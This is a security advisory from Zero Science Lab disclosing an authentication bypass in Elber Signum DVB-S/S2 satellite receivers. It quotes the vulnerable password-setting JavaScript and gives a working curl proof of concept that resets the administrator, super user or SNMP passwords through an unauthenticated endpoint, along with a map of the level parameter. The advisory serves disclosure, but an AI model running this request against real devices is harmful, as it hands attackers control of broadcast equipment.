Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication BypassVendor: Elber S.r.l.Product web page: https://www.elber.itAffected version: 1.999 Revision 1243                  1.317 Revision 602                  1.220 Revision 1250                  1.220 Revision 1248_1249                  1.220 Revision 597                  1.217 Revision 1242                  1.214 Revision 1023                  1.193 Revision 924                  1.175 Revision 873                  1.166 Revision 550Summary: The SIGNUM controller from Elber satellite equipment demodulatesone or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving256 KS/s as minimum symbol rate. The TS demodulated signals can be alignedand configured in 1+1 seamless switching for redundancy. Redundancy can alsobe achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/IIaudio codec, providing analog and digital outputs; moreover, it’s possibleto set a data PID to be decoded and passed to the internal RDS encoder,generating the dual MPX FM output.Desc: The device suffers from an authentication bypass vulnerability througha direct and unauthorized access to the password management functionality. Theissue allows attackers to bypass authentication by manipulating the set_pwdendpoint that enables them to overwrite the password of any user within thesystem. This grants unauthorized and administrative access to protected areasof the application compromising the device's system security.--------------------------------------------------------------------------/modules/pwd.html------------------50: function apply_pwd(level, pwd)51: {52:   $.get("json_data/set_pwd", {lev:level, pass:pwd},53:   function(data){54:     //$.alert({title:'Operation',text:data});55:     show_message(data);56:   }).fail(function(error){57:     show_message('Error ' + error.status, 'error');58:   });59: }--------------------------------------------------------------------------Tested on: NBFM Controller           embOS/IPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5814Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5814.php18.08.2023--$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234Ref (lev param):Level 7 = SNMP Write Community (snmp_write_pwd)Level 6 = SNMP Read Community (snmp_read_pwd)Level 5 = Custom Password? hidden. (custom_pwd)Level 4 = Display Password (display_pwd)?Level 2 = Administrator Password (admin_pwd)Level 1 = Super User Password (puser_pwd)Level 0 = User Password (user_pwd)